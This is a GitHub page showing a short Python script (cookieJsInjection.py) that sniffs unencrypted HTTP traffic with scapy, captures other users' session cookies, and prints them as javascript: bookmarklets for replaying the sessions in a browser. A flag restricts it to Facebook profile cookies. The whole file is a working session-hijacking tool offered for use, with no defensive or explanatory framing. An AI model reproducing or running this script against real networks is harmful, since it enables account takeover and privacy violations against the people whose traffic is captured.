forked from diogomonica/py-cookieJsInjection
-
Notifications
You must be signed in to change notification settings - Fork 0
/
cookieJsInjection.py
68 lines (56 loc) · 1.97 KB
/
cookieJsInjection.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/env python
import sys, os
from scapy.all import *
cookies_seen =()
def isRoot():
"""Verifies if the current user is root"""
return os.getuid() & os.getgid() == 0
def dictStringValue(raw_values):
value = raw_values.split('=')
return {value[0].strip():value[1].strip()}
def cookieIntoDict(raw_cookie):
cookie_list = raw_cookie.split(';')
cookie = {}
for element in cookie_list:
try:
cookie.update(dictStringValue(element))
except IndexError:
pass
return cookie
def extractCookie(headers):
raw_cookie =""
for line in headers.split('\n'):
if 'Cookie:' in line:
raw_cookie = line
return cookieIntoDict(raw_cookie[len("Cookie: "):])
def jsCookie(dictCookie):
return ''.join(['void(document.cookie="' + key + '=' + dictCookie[key]+ '");' for key in dictCookie.keys()])
def printCookie(cookie):
for key in cookie.keys():
print "%s = %s" % (key,cookie[key])
print "[*] Javascript Injection code:"
print 'javascript:' + jsCookie(cookie) + '\n'
def sniffCookies(p):
global cookies_seen
if 'Cookie:' in getattr(p,'load',''):
cookie = extractCookie(p.load)
if not "-facebook" in sys.argv and cookie not in cookies_seen:
print "[+] New cookie seen: "
printCookie(cookie)
elif cookie.has_key("datr") and cookie.has_key("c_user") and cookie["c_user"] not in cookies_seen: # We have ourselves a facebook Cookie from a unseen profile
print "# Found cookie for facebook user %s:" % cookie["c_user"]
printCookie(cookie)
cookies_seen = cookies_seen + (cookie["c_user"],)
cookies_seen = cookies_seen + (cookie,)
def printUsage():
print "Usage: %s IFACE <-facebook>" % sys.argv[0]
if __name__ == "__main__":
if len(sys.argv) < 2:
printUsage()
sys.exit(0)
if not isRoot():
print "[-] Your have to be root to sniff interfaces"
sys.exit(0)
interface = sys.argv[1]
if "-facebook" in sys.argv: print "[+] Printing facebook profile cookies only"
sniff(iface=interface,filter="tcp port 80",prn=sniffCookies)